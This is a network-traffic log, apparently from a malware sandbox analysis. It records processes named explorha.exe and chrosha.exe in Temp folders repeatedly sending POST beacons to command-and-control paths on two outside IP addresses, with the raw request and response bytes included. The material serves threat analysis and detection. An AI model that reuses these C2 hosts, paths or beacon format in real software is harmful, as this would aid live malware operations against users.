                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:21.132797956 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1169192.168.2.551023193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:20.916228056 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:21.162967920 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1170192.168.2.551024193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:21.421154022 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:21.673413038 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1171192.168.2.551025193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:21.497060061 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:21.746897936 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:21 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1172192.168.2.551026193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:21.999202967 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:22.248881102 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1173192.168.2.551027193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:22.025607109 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:22.271529913 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1174192.168.2.551028193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:22.521315098 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:22.773346901 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1175192.168.2.551029193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:22.600732088 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:22.844890118 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:22 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1176192.168.2.551030193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:23.092057943 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:23.338212013 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      1177192.168.2.551031193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:23.124923944 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:23.376434088 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1178192.168.2.551032193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:23.631459951 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:23.881716013 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1179192.168.2.551033193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:23.691299915 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:23.933403969 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:23 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1180192.168.2.551034193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:24.186110020 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:24.436192036 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1181192.168.2.551035193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:24.228682995 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:24.471506119 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1182192.168.2.551036193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:24.722877026 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:24.974175930 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1183192.168.2.551037193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:24.786358118 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:25.029217005 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:24 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1184192.168.2.551038193.233.132.16780
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:25.293483973 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:25.550812960 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:35:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                      1185192.168.2.551039193.233.132.5680
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:35:25.317909002 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
